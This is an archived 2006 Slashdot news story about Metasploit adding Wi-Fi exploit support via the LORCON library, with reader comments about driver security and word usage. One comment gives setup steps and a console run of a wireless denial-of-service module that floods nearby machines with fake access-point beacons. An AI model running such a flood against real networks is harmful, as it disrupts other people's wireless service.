Wi-Fi Exploits Coming to Metasploit

← Back to Stories (view on slashdot.org)

Wi-Fi Exploits Coming to Metasploit

Posted by ryuzaki0 on Thursday October 26, 2006 @09:23AM from the wi-fi-sploitz dept.

bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."

15 of 50 comments (clear)

Min score:

Reason:

Sort:

Thanks Guys by 99BottlesOfBeerInMyF · 2006-10-26 09:39 · Score: 3, Insightful

No really, I appreciate all the work that goes into putting this together. I'm sure privately distributed cracking tools already have some of this functionality. Maybe this will get OS vendors to pay a little more attention to wireless security. Wireless is not likely to be widely exploited mechanism for a worm, but it is still something that needs more attention.
Math problem by Anonymous Coward · 2006-10-26 09:42 · Score: 3, Funny

W=10.1
F=9.8
i=2673.7

What is Wi-Fi?
1. Re:Math problem by richdun · 2006-10-26 09:46 · Score: 2, Funny
  
  0.3i
2. Re:Math problem by dr.badass · 2006-10-26 09:51 · Score: 4, Funny
  
  i=2673.7
  
  With Metasploit you can make i = 4456.66
  
  --
  Don't become a regular here -- you will become retarded.
3. Re:Math problem by Anonymous Coward · 2006-10-26 09:55 · Score: 3, Informative
  
  For those too lazy to work it out...
  
  Wi-Fi = i(W-F) = 3673.7 ( 0.3) = 802.11
4. Re:Math problem by Grym · 2006-10-26 12:16 · Score: 4, Funny
  
  My God! That'd be like 9/11 times 4.8921! We can't allow this to happen!
  -Grym
So..... by robpoe · 2006-10-26 09:43 · Score: 2, Funny

Do I wrap my laptop in tinfoil yet, or not?

--
= Grow a brain...
This begs the question... by mohjlir · 2006-10-26 09:44 · Score: 2, Interesting

Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly? Of course, there is no guarantee that the white hats will find problems before the black hats do, but it exposes flaws more eyeballs.
1. Re:This begs the question... by 99BottlesOfBeerInMyF · 2006-10-26 09:50 · Score: 3, Insightful
  
  Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly?
  
  Some of them probably will, but a lot of hardware vendors are reflexively secretive. Others, use the drivers to work around bugs in their products or are embarrassed of the shoddy quality of their code. I'd love the believe that the industry will start to demand open source drivers, but realistically, it is more likely that the OS developer community will have to account for untrusted hardware drivers by seriously re-architecting the way the kernel interacts with drivers.
2. Re:This begs the question... by ehrichweiss · 2006-10-26 10:39 · Score: 2, Informative
  
  I don't know why others might not release their drivers' source but I know that Broadcomm apparently can't do it for at least some of their wireless cards because they apparently can be tuned into some military-only frequencies and needless to say that's not a good thing.
  
  --
  0x09F911029D74E35BD84156C5635688C0
3. Re:This begs the question... by cdrguru · 2006-10-26 11:14 · Score: 2, Insightful
  
  The number one reason this isn't done is the difference between the hardware manufactured by the driver author and the hardware manufactured by slave labor in China is the driver. Period. The chips are nearly a commodity now. There isn't anything unique about that - it is how they are used in the software.
  
  15-20 years ago, it is was the design of the hardware that was where the value was. Today, it is mostly the software running the hardware.
  
  An open driver just means that they are giving away whatever value the design has to the factory in China which will sell the same unit for half the price. Not a real effective way to stay in business.
So where is the code? Right here. by spinja · 2006-10-26 10:04 · Score: 5, Informative

Install the latest Lorcon snapshot:
$ http://www.802.11mercenary.net/lorcon/

Grab the latest version of metasploit 3:
$ svn co http://metasploit.com/svn/framework3/trunk/

Compile the Metasploit Lorcon wrapper:
$ cd trunk/external/msflorcon
$ make

Plug in a support network card (I use a WPN511 with the madwifi-old driver in Gentoo)

Load the Metasploit Console (as root, since it needs raw WiFi access)
# trunk/msfconsole

Play with some of the demo modules :-)

This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
msf > use auxiliary/dos/wireless/fakeap
msf auxiliary(fakeap) > show options

Module options:

CHANNEL 11 yes The default channel number
DRIVER madwifi yes The name of the wireless driver for lorcon
INTERFACE ath0 yes The name of the wireless interface

Type the "run" command, or use "set VARIABLE VALUE" to change these options.

msf auxiliary(fakeap) >run
1. Re:So where is the code? Right here. by towsonu2003 · 2006-10-26 11:09 · Score: 3, Funny
  
  sounds to me like it needs a GUI ;)
Re:You must be a perscriber by Dhalka226 · 2006-10-26 10:51 · Score: 3, Insightful

Language is how the majority use it, not how scholars define it.

So I guess "loose" and "lose" are now synonymous..
I just really don't agree. I'm not the kind who generally goes off on people for misusing words as long as I can understand what they're trying to say, but at the same time, words have meanings. The fact that people have no idea how to properly use those words should not change what the words mean. It should just make us exceptionally sad at the state of affairs our communications skills are in.
Incidentally, this is coming from somebody who misused the phrase "begs the question" dozens of times in his life. The difference being, when it was pointed out to me (I forget if somebody said something or I just came across the correct usage one day), I actually made a mental note of it and I have used it properly since then. It wasn't hard. Neither, as my little joke intimated, is using "lose" and "loose" properly. It just takes a little conscious effort at first, and then it will become second nature.
Personally I think we should be getting people to do that rather than pandering to them and altering the meaning of words and phrases once we reach some ignorance threshold.
Re:You must be a perscriber by foamrotreturns · 2006-10-26 11:54 · Score: 3, Insightful

I am very much in agreement. If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing. If I said "That begs the question" 75 years ago, most people would realize that I was calling out the speaker for using a circular argument. Saying "That begs the question" today evokes responses like "What question?" The meaning is nearly lost. We have hundreds of thousands of simple words and phrases that we use to convey much more complex concepts. If we let our language become eroded by the uneducated masses, how will we become educated? We will waste all of our time explaining our ideas in excruciating detail rather than using the previously ubiquitous simplified words and phrases that were crafted to symbolize those very concepts.
Don't use words and phrases for which you haven't learned the meanings!